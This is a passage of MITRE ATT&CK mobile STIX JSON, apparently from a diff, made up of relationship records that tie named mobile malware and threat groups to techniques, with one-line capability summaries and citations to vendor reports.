"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394", + "created": "2021-02-08T16:36:20.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:07:15.780Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has region-locked their malicious applications during their Operation BULL campaign.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5a50d9da-3fa5-443e-8367-8a0520d58cae", + "created": "2020-12-24T22:04:27.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:04:02.992Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has used HTTP POST requests for C2.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--34dd5c26-eec9-4288-8e53-677271d490b2", + "created": "2023-01-18T19:46:02.646Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:43:57.834Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use accessibility event logging to steal data in text fields.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--89d0de37-87ba-4aa8-832a-a2305e658a7d", + "created": "2023-03-20T15:55:09.279Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:55:09.279Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d358ac0b-4c67-44e3-939b-24cd36d3c3fb", + "created": "2020-09-11T16:22:03.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:58:57.686Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect the device’s cell tower information.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19f220fd-94e8-4c8f-971d-ad37d7eeee80", + "created": "2022-03-31T19:51:41.431Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS users should be instructed to not download applications from unofficial sources, as applications distributed via the Apple App Store cannot list installed applications on a device.", + "modified": "2022-03-31T19:51:41.431Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--12de5aeb-9427-4665-81a0-257c76d6f188", + "created": "2023-03-03T16:20:48.781Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:20:48.781Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has replaced device apps with ones it has downloaded.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--88ded3fb-759e-4e96-946b-e7148c54856e", + "created": "2022-04-08T16:29:30.371Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-08T16:29:30.371Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2", + "created": "2023-03-20T15:28:54.837Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:28:54.837Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--59aaa62b-a629-42c8-9bd2-8e75810135a9", + "created": "2022-04-05T19:52:32.201Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:52:32.201Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce26f077-c47a-4185-8ed7-ec0d9ae2b625", + "created": "2022-03-31T16:33:55.074Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-31T16:33:55.074Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e4c347e9-fb91-4bc5-83b8-391e389131e2", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--14474366-938a-4359-bf24-e2c718adfaf5", + "type": "relationship", + "created": "2020-06-26T14:55:13.382Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.382Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can download new libraries when instructed to.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c65661a6-6047-4901-ac2c-3ca4b1bbbb28", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017.", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:24:32.173Z", + "description": "[DroidJack](https://attack.mitre.org/software/S0320) captures call data.(Citation: Zscaler-SuperMarioRun)", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8a961514-3372-4c3e-b7ee-e3d053c3d5f3", + "type": "relationship", + "created": "2020-09-11T14:54:16.615Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.615Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can record videos.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--670a0995-a789-4674-9e91-c74316cdef90", + "type": "relationship", + "created": "2020-09-11T14:54:16.621Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.621Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can record audio from phone calls and the device microphone.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f28a2873-281f-405b-bad0-4a93dac8a5ee", + "created": "2020-11-24T17:55:12.895Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can show a phishing WebView pretending to be a Google service that collects credit card information.(Citation: Talos GPlayed)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--886849fc-f83c-4d69-b700-bfad0def765d", + "created": "2023-03-16T18:32:30.054Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:32:30.054Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f4cc3b3a-284d-4a2d-9ab8-e7fa916c4012", + "type": "relationship", + "created": "2020-12-14T14:52:03.218Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T14:52:03.218Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can obtain the running application.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--50ad2a8c-ed45-4376-be31-8bafa26ba794", + "type": "relationship", + "created": "2020-04-08T15:41:19.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:41:19.451Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can collect the device’s ID.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb5c6c5e-53d4-4bb9-b9cf-74170058b19b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-10-15T19:44:36.125Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) collected and exfiltrated data from the device, including sensitive letters/documents, stored photos, and stored audio files.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--716f68ee-1e77-4254-8f67-d8f3c71db678", + "type": "relationship", + "created": "2021-09-20T13:59:00.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-09-20T13:59:00.498Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can be controlled via phone call from a set of \"control phones.\"(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a28a53e9-7a42-4f81-bced-0efbc3128cbd", + "type": "relationship", + "created": "2019-09-04T15:38:56.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + } + ], + "modified": "2019-09-10T14:59:25.979Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) encrypts its configuration file using AES.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c720fd30-5694-42b7-bf77-d948f7ba2b6f", + "created": "2020-06-24T18:24:35.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:30:27.616Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can extract the device’s keychain.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b4180067-52b6-4109-91df-52fd9a7ed2e8", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) gathers audio from the microphone.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f7c5c344-4310-4e2a-a5aa-133f3d132fff", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.021Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) can perform GPS location tracking as well as capturing coordinates as when an SMS message or call is received.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9", + "created": "2020-04-08T15:51:25.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:30:28.587Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can download the device’s contact list.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eb27258f-6bb9-49b5-928e-b66f37f8f16e", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:55.047Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) requests Android Device Administrator access.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--58c15bce-1593-4be1-ae56-7e7b2634fc56", + "created": "2020-06-26T15:32:25.045Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:05.040Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can collect SMS messages from a device.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + 